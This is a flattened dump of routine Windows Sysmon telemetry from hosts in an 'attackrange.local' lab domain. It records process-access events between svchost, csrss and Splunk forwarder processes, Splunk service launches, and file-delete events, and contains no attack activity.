07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.247{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.247{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.247{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.248{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.700{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D9B967FD6AABE34D87DD020C0D7F01B,SHA256=4F1608F0F3408C348BC5BA829CB6C5E1CF36205726021014F35FB40B37A1D038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.252{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=67B11B591D649AD9B770DDCB477B55F1,SHA256=C53B13E4A305195745057309897BDA354B88D67B162681FEE45CC7366D1A3182,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.205{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=06B808D8D07D488B3B36D9A71E3F3902,SHA256=197E9ED644811FDAB36894CD8B41B693FCE3A630F8658F14C7B76641584CAD72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.120{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5FF48B01967F888FCF9F472C69DD55,SHA256=301D5B788D3AFC8104D182055DDE4B181BD93489BA800CEBBB55AE5171978FBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.419{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D43C138D22B9EC33AE6854270108BBB,SHA256=D53498324C1AAFB740B193B4254CAEEFAA8A402BC3D1C95D73A180DEB3A5B87E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF6A41A543839494246A28B65C9C3813,SHA256=C5BDBA0769A8310A27E2C18B5EBF3850CBFC401169CCA8A35E376C7136DA427F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.982{0C1E0330-F442-60EB-6979-00000000D001}9241052C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 